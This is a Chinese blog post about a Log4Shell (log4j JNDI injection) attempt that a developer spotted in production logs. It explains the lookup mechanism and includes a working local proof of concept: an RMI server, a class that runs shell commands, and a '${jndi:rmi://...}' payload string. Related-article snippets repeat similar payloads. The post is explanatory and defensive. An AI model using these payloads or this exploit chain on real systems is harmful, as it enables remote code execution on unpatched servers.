记录一次针对log4j的jndi注入攻击

最新推荐文章于 2024-05-11 14:09:06 发布
最新推荐文章于 2024-05-11 14:09:06 发布
阅读量3.5k 收藏 2
点赞数 1
文章标签: 安全 web安全 java
本文为博主原创文章,未经博主允许不得转载。
本文链接:https://blog.csdn.net/hao_yan_bing/article/details/121982422
版权

事件经过

今天一到公司就被钉钉监控报警群@了,报错类型如下图所示:

image-20211216143522987

com.mysql.jdbc.MysqlDataTruncation:Data truncation:Data too long for column这个错误很常见,就是插入数据到数据库中,字段长度超过了数据库限制的长度。

于是我就去skywalking上找日志,看到底是什么参数超过了长度限制,于是我找到了报错的链路看到了网关打印的日志信息如下:

image-20211216144627034

重点看我红线框出的部分,这一看就不是一个正常的传参,看起来像是某种攻击。

由此让我联想到,前几天log4j爆出的漏洞,于是我上网查了下,确实log4j这次的漏洞就是通过jndi进行攻击的。

image-20211216145205003

但是,我们公司用户日志组件并不是log4j,而是logback,所以这次攻击对我们服务没有造成实际影响。感觉是逃过了一劫,但是也暴露出我们公司的安全意识很差。

log4j漏洞

既然都攻击到家门口了,肯定有必要了解下log4j的这次攻击原理。

log4j的这个漏洞主要是因为lookup的机制,允许日志中通过${}的方式进行属性注入。jndi估计很多人没用过,也不大了解,下面是我从维基百科找到的定义:

Java命名和目录接口(Java Naming and Directory Interface,缩写JNDI),是Java的一个目录服务应用程序接口(API),它提供一个目录系统,并将服务名称与对象关联起来,从而使得开发人员在开发过程中可以使用名称来访问对象。

img

简单的理解,jndi是一个名字服务器,可以通过名字来访问对象。jndi下面又有很多SPI的实现,比如LDAP、RMI等。问题主要就在RMI这里,RMI是远程服务调用,jndi可以通过url加载远程class文件的方式执行服务。

比如我们让RMI客户端去访问jndi:rmi://localhost:1099/evil,它就会去本地1099端口服务获取名字为evil的对象,获取到对象内容,然后初始化对象。初始化对象会执行对象里面的构造方法,static方法等,如果这里面有一些恶意代码,就能轻易的攻击你的系统。

当我们使用log4j去打印日志的时候,log4j在遇到${}这种符号时,就会去lookup里面的内容。

log4j漏洞演示

下面我们来一个简单的示例,演示一下这个bug。

我们通过执行远程代码打开本机的计算器为例。首先,我们需要写一个RMI的服务端:

public class RmiServer {
    public static void main(String[] args) throws Exception {
        Reference reference = new Reference("com.haoyanbing.bug.log4j.hack.HackCommand", "com.haoyanbing.bug.log4j.hack.HackCommand", "http://localhost:8080/");
        ReferenceWrapper referenceWrapper = new ReferenceWrapper(reference);
        LocateRegistry.createRegistry(1099).bind("evil", referenceWrapper);
    }
}

我们的攻击类:

package com.haoyanbing.bug.log4j.hack;

public class HackCommand {
    public HackCommand() throws IOException {
        Runtime rt = Runtime.getRuntime();
        String property = System.getProperty("os.name");
        if ("Mac OS X".equals(property)) {
            String[] commands = {"/bin/sh", "-c", "open /System/Applications/Calculator.app"};
            rt.exec(commands);
        } else {
            rt.exec("cmd  /c calc");
        }
    }
}

然后将服务端启动,再写一个测试类,去测试一下

public class Log4jTest {
    private static final Logger logger = LogManager.getLogger();

    public static void main(String[] args) {
        System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase", "true");
        String input = "${jndi:rmi://localhost:1099/evil}";
        logger.error("log:{}", input);
    }
}

果然,我本地的计算器程序被打开了:

image-20211216151100149

总结

log4j前几天爆出这个漏洞的时候,我们公司好像没怎么care这个事。这次只能说是我们走运,正好我们用的不是log4j,用的是logback,虽然这次攻击没有给我们系统造成实际的影响,但是给我们提了个醒,系统安全还是很重要的,针对社区爆出的漏洞,要及时关注。

程序员大兵
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
JNDI RMI 注入Log4j2漏洞)
sun0322
12-24 8237
目录 ■相关知识 1.SLF4J(Simple logging Facade for Java) // 简单日志门面 ■(log4j2)漏洞 ■JNDI 注入代码实现(RMI) ■代码细节说明 1.javax.naming.Reference // 构造方法 2.代码中使用的服务如何构建 SimpleHTTPServer // (Python)快速共享目录 3.RMI的利用版本限制 4.问答 5.RMI(Remote Method Invocation)为远程方法调用 ●在攻击..
JNDI注入&Log4j&FastJson&白盒审计&不回显处理
qq_46081990的博客
12-19 1615
本文介绍了JNDI的概念和作用,以及LDAP和RMI两个常用的协议,Log4j / FastJson 简介及其Maven仓库配置,着重介绍了漏洞利用,以迷你天猫购物项目 Tmall 做了 Log4j / FastJson 漏洞的代码审计,最后介绍了不回显情况的处理方法。
Java最新Log4j2的JNDI注入漏洞原理分析与思考,2024最新华为Java校招面试题
最新发布
2401_84024497的博客
05-11 658
我们总是喜欢瞻仰大厂的大神们,但实际上大神也不过凡人,与菜鸟程序员相比,也就多花了几分心思,如果你再不努力,差距也只会越来越大。实际上,作为程序员,丰富自己的知识储备,提升自己的知识深度和广度是很有必要的。
Log4j2日志框架JNDI注入漏洞分析与复现
两米以下皆凡人的博客
12-14 5156
1、漏洞背景 大家在实际开发中,几乎无可避免的需要用到日志框架,不管你是前端后端客户端,他们可以追踪和记录我们的程序运行中的信息,我们可以利用日志很快定位问题,追踪分析。 而对于Java开发人员来说,最常用的日志框架便是Log4j2和logback,而本次漏洞的主角便是Apache Log4j2,它有一个特别强大的功能插件Lookups 如果我们试图通过日志去输出一个程序中不存在的对象,而在其他地方,那么我们便可以通过这个插件去通过某些方式去查找目标内容,它只提供一种规范,具体使用哪些方式去查找
log4j JNDI漏洞CVE-2021-44228 针对于不同版本的解决方案
smlie_shuihan的博客
12-12 4533
问题描述: Apache Log4j 2存在远程代码执行漏洞,攻击者可通过构造恶意请求利用该漏洞实现在目标服务器上执行任意代码 漏洞影响版本:2.0 <= Apache Log4j 2 <= log4j-2.15.0-rc1 看一下目前log4j的maven官方仓库版本,几乎是主流常用版本都受影响 解决方案: 试了一下网上几种方案,绝大部分都是解决 >=2.10 版本的方案 : 1、第一种方案,更新log4j版本 https://github.com/apache/logging-log
核弹级漏洞,我把log4j底裤都给扒了
MachineGunJoe666
12-12 1077
大家好,我是周杰伦。 相信大家这两天应该被这么一条新闻刷屏了: 这个漏洞到底是怎么回事? 核弹级,真的有那么厉害吗? 怎么利用这个漏洞呢? 我看了很多技术分析文章,都太过专业,很多非Java技术栈或者不搞安全的人只能看个一知半解,导致大家只能看个热闹,对这个漏洞的成因、原理、利用方式、影响面理解的不到位。 这篇文章,我尝试让所有技术相关的朋友都能看懂**:这个注定会载入网络安全史册上的漏洞,到底是怎么一回事!** log4j2 不管是什么编程语言,不管是前端后端还是客户端,对打日志都不会陌生。 通过日志,
log4j-2.15.0-rc2.zip
12-11
Log4j 2.15.0-rc2版本中,开发团队针对JNDI注入漏洞进行了关键的修复。主要的改进包括: 1. **默认禁用JNDI查找**:新版本中,默认情况下,所有JNDI查找都被禁止,防止未经验证的外部数据触发查找操作。 2. **...
logging-log4j2-log4j-2.15.1-rc1.zip
12-13
然而,随着技术的发展,安全问题也日益凸显,Log4j 2.15.1-RC1的发布,正是针对此类问题进行的一次关键更新,旨在修复已知的安全漏洞。 Log4j 2.15.1-RC1是Log4j 2.x系列的一个重要版本,主要关注的是一个名为CVE-...
ApacheLog4j_Win.zip
01-05
这意味着该压缩包可能包含一系列用于检测和测试Log4j 2安全漏洞的工具和脚本,特别是针对JNDIJava Naming and Directory Interface)注入漏洞,也称为CVE-2021-44228或“Log4Shell”漏洞。 Log4j 2的安全漏洞,...
log4j2升级包2.15和2.16
12-14
标题提到的"Log4j2升级包2.15和2.16"主要关注的是Log4j2框架的安全更新,尤其是针对CVE-2021-44228(Apache Log4j2 JNDI注入漏洞)的修复。 描述中的内容虽然简洁,但暗示了这次升级的主要目的是解决安全问题。Log4...
漏洞复现 -“核弹”漏洞-Log4j2 JNDI注入(CVE-2021-44228)
菜鸟的测试世界
05-07 953
该漏洞被评为“核弹”级别,实在是log4j使用范围太广了,只要写java的,没几个没听过用过log4j吧。 漏洞原理 利用jndi的Lookup功能,实现jndi注入命令执行 影响范围 log4j 2.0-beta9到2.15.0(1.* 版本不受影响) 复现环境 jdk: 1.8.0_181 log4j:2.14.1 OS:Win10 复现步骤 1. 创建一个springboot的工程,验证当前的log4j库是否存在漏洞。 能解析${}表达式的才存在漏洞,官网的log...
Apache Log4j任意代码执行漏洞安全风险通告第三次更新
smellycat000的专栏
12-10 4440
奇安信CERT致力于第一时间为企业级用户提供安全风险通告和有效解决方案。风险通告近日,奇安信CERT监测到Apache Log4j存在任意代码执行漏洞。经过分析,该组件存在Java JND...
log4j2 JNDI注入漏洞问题处理
逗神的博客
12-13 3181
log4j2 JNDI注入漏洞问题处理
log4j2 JNDI注入复现
qq_20504373的博客
12-14 6437
复现现象: 这个镜像使用了log4j2用来当做靶机程序 1、拉取一个docker镜像 docker pull vulfocus/log4j2-rce-2021-12-09 2、跑起来docker run -tid -p 38080:8080 vulfocus/log4j2-rce-2021-12-09 3、进入这个平台 https://log.xn–9tr.com/ 点击获取一个域名 4、执行一个post curl -X POST -F “payload=${jndi:ldap://
RMI、JNDI、LDAP介绍+log4j漏洞分析
HBohan的博客
02-28 2286
本篇主要介绍java的RMI、JNDI、LDAP,在后面会详细分析log4jjndi注入原理。
log4j2 jndi注入漏洞复现
朴实,坚持,兴趣
12-12 9982
log4j2 jndi注入漏洞复现
Java日志:log4j JNDI漏洞分析
Yal_insist的博客
04-16 1107
Java日志:log4j JNDI漏洞分析
JNDI注入(RMI攻击实现和LDAP攻击实现)
weixin_45682070的博客
12-12 9406
0x01 JNDI 概述 JNDIJava Naming and Directory Interface(JAVA命名和目录接口)的英文简写,它是为JAVA应用程序提供命名和目录访问服务的API(Application Programing Interface,应用程序编程接口) 简单一点理解就是:JNDI的做法,就是定义一个数据源,与系统外部的资源的引用 都可以通过JNDI定义和引用 JNDI可访问的现有的目录及服务有: DNS、XNam 、Novell目录服务、LDAP(Lightweight Dir
JNDI注入学习1
08-03
JNDI注入是一种利用JNDI接口的漏洞进行攻击的技术。JNDIJava Naming and Directory Interface)是一个用于目录服务的Java API,它允许Java客户端通过名称来发现和查找数据和资源。JNDI独立于底层实现,并通过一个...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值